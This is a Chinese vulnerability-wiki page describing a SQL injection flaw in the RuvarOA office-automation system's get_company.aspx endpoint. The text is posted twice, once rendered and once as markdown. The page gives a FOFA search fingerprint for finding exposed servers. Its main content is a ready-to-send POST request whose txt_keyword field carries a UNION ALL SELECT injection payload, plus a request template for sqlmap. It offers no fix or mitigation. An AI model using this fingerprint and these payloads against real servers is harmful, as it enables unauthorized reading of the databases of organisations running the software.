fofamini-wiki

登录白背景

源码

RuvarOA get_company存在SQL注入漏洞

一、漏洞简介

RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合，基于Windows平台，构建在大型关系数据库管理系统基础上的，以行政办公为核心，以集成融通业务办公为目标，将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。RuvarOA get_company存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

RuvarOA v6.01
RuvarOA v12.01

三、资产测绘

fofabody="txt_admin_key"
特征

四、漏洞复现

POST /ContractManage/get_company.aspx HTTP/1.1
Host: 
Content-Length: 527
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYGAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WAh4RUGFnZXJfUmVjb3JkY291bnRmZGRkkF7Fra0mv6NIEvEWzCtrd3VHKNxuM7stEqn5DF0zdWg=&ddl_type=&ddl_field=dw_bh&txt_keyword=11%27+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%2883%29%2BCHAR%2871%29%2BCHAR%2878%29%2BCHAR%28117%29%2BCHAR%28106%29%2BCHAR%2870%29%2BCHAR%2875%29%2BCHAR%2883%29%2BCHAR%28122%29%2BCHAR%28101%29%2BCHAR%2898%29%2BCHAR%2872%29%2BCHAR%2866%29%2BCHAR%2869%29%2BCHAR%28113%29%2BCHAR%28116%29%2BCHAR%2884%29%2BCHAR%28107%29%2BCHAR%2881%29%2BCHAR%2880%29%2BCHAR%28113%29%2BCHAR%2890%29%2BCHAR%28118%29%2BCHAR%2872%29%2BCHAR%2875%29%2BCHAR%28121%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%2890%29%2BCHAR%2882%29%2BCHAR%28122%29%2BCHAR%2897%29%2BCHAR%2868%29%2BCHAR%28103%29%2BCHAR%2886%29%2BCHAR%28114%29%2BCHAR%28111%29%2BCHAR%2885%29%2BCHAR%28120%29%2BCHAR%2868%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29--+YZtQ&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=

sqlmap

POST /ContractManage/get_company.aspx HTTP/1.1
Host: 
Content-Length: 527
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYGAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WAh4RUGFnZXJfUmVjb3JkY291bnRmZGRkjBOPpsjzfyKuMGne7EKY2cnc17Zi99ZVNb4cfmiP0Z0%3D&ddl_type=&ddl_field=dw_bh&txt_keyword=11&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=

原文: https://www.yuque.com/xiaokp7/ocvun2/ndd1fnkt5ui2mrgu

# RuvarOA get_company存在SQL注入漏洞

# 一、漏洞简介
RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合，基于Windows平台，构建在大型关系数据库管理系统基础上的，以行政办公为核心，以集成融通业务办公为目标，将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。RuvarOA get_company存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- RuvarOA v6.01 
- RuvarOA v12.01

# 三、资产测绘

- fofa`body="txt_admin_key"`
- 特征

![image.png](./img/UoWhfprRLIpvtgNQ/1715412038765-d7c66ac0-f855-49ad-bc97-9b535cebff1d-568277.png)

# 四、漏洞复现
```
POST /ContractManage/get_company.aspx HTTP/1.1
Host: 
Content-Length: 527
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYGAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WAh4RUGFnZXJfUmVjb3JkY291bnRmZGRkkF7Fra0mv6NIEvEWzCtrd3VHKNxuM7stEqn5DF0zdWg=&ddl_type=&ddl_field=dw_bh&txt_keyword=11%27+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%2883%29%2BCHAR%2871%29%2BCHAR%2878%29%2BCHAR%28117%29%2BCHAR%28106%29%2BCHAR%2870%29%2BCHAR%2875%29%2BCHAR%2883%29%2BCHAR%28122%29%2BCHAR%28101%29%2BCHAR%2898%29%2BCHAR%2872%29%2BCHAR%2866%29%2BCHAR%2869%29%2BCHAR%28113%29%2BCHAR%28116%29%2BCHAR%2884%29%2BCHAR%28107%29%2BCHAR%2881%29%2BCHAR%2880%29%2BCHAR%28113%29%2BCHAR%2890%29%2BCHAR%28118%29%2BCHAR%2872%29%2BCHAR%2875%29%2BCHAR%28121%29%2BCHAR%28112%29%2BCHAR%28120%29%2BCHAR%2890%29%2BCHAR%2882%29%2BCHAR%28122%29%2BCHAR%2897%29%2BCHAR%2868%29%2BCHAR%28103%29%2BCHAR%2886%29%2BCHAR%28114%29%2BCHAR%28111%29%2BCHAR%2885%29%2BCHAR%28120%29%2BCHAR%2868%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28112%29%2BCHAR%28113%29--+YZtQ&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=
```
![image.png](./img/UoWhfprRLIpvtgNQ/1715415066261-71e0790a-fab8-4110-9acb-ef5e4dbd6abd-825328.png)
sqlmap
```
POST /ContractManage/get_company.aspx HTTP/1.1
Host: 
Content-Length: 527
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux i686) Gecko/20060204 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Connection: close

__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NjkyODU1NDAPZBYCAgMPZBYGAgEPEGQPFgFmFgEQBQzpgInmi6nliIbnsbtlZxYBZmQCCQ88KwALAQAPFggeCERhdGFLZXlzFgAeC18hSXRlbUNvdW50Zh4JUGFnZUNvdW50AgEeFV8hRGF0YVNvdXJjZUl0ZW1Db3VudGZkZAILDw8WAh4RUGFnZXJfUmVjb3JkY291bnRmZGRkjBOPpsjzfyKuMGne7EKY2cnc17Zi99ZVNb4cfmiP0Z0%3D&ddl_type=&ddl_field=dw_bh&txt_keyword=11&btnSearch=%E6%9F%A5%E8%AF%A2&pager_input=1&pager_select=20&txt_row_index=&txt_dw_id=&txt_dw_mc=&txt_dw_bh=&txt_dw_lxr=&txt_dw_dh=
```
![image.png](./img/UoWhfprRLIpvtgNQ/1715415086452-765620b5-165b-4aaa-9ca4-49084948dee9-979480.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ndd1fnkt5ui2mrgu>